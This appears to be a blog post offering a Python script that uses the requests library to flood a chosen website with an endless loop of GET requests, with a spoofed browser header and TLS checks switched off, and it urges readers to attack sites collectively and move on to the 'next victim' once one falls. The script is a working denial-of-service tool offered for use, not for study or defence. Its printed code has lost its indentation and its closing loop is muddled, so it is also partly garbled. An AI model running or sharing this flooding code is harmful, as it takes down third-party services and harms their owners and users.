DOS-атак

Python and DOS attacks using the requests library

Hello everyone! A short post today, inspired by the current situation. We’re going to experiment with DOS attacks using the requests library in Python.

First off—what is a DOS attack? It’s creating a situation where we either individually (not very effective with today’s computing power) or collectively (oh yes!) generate some load on the target server. A large number of requests forces the server to allocate resources to respond, which eventually leads to the server becoming overloaded and unable to handle the requests that actually matter. So, let’s figure out how to create these requests! 🙂

The logic of today’s code is very simple—we send a request to a website and try to retrieve the full code of the page we’re interested in. It’s a small thing, but when there are a million small things—the site starts to slow down and eventually stops working stably. For our computer and connection, this is an almost unnoticeable load.

Here’s an example of the code below (and yes, thanks to my subscriber Lev, who is currently in Kyiv, for testing and comments. Things are very difficult there, but he remains optimistic—big respect to him for that!):

import requests  # we’ve connected the requests library (I’ve written about it <a href="https://lavrynenko.com/?s=requests" rel="noopener" target="_blank">multiple times</a>)
def get_link():  # Create a function that gets the link to the target site
link = input(str('Link: '))
get_content(link)
def get_content(link):  # Create a function that will actually generate requests to the target site
i = 1
while True:
try:
r = requests.get(link, headers={'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/69.0'}, verify=False)  # Fake browser header
r_answer = r.content  # Create a variable containing the page’s source code
print('Packets sent:', i)  # Output statistics
i = i + 1
except:
print('Seems like the site', link, 'is down. Double-checking...')  # Is it down? Let’s check just in case :) 
try:
r = requests.get(link, headers={'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/69.0'}, verify=False)
r_answer = r.content
print('Definitely down :) Choosing the next victim.')  # Definitely down. Let’s choose the next victim? :) 
get_link()
except:
print('Definitely down :) Choosing the next victim.')
get_link()
while True:
get_content(get_link())
get_link()

Thanks for your attention! As always—if you have any questions, feel free to write to me via email or Telegram.

Tomorrow, I’ll try to release a version of a simple attacker based on Ping requests as a desktop application (the problem with modern computer users is that most of them have no idea how to use the command line). Glory to Ukraine!

Support the Blog!

Running a blog takes a lot of effort, time, and passion. Your donations help improve the content, inspire new ideas, and keep the project going.
If you’ve enjoyed the blog’s materials, any support would mean the world to me. Thank you for being here! ❤️

PayPal Logo Donate via PayPal

Revolut Logo Donate via Revolut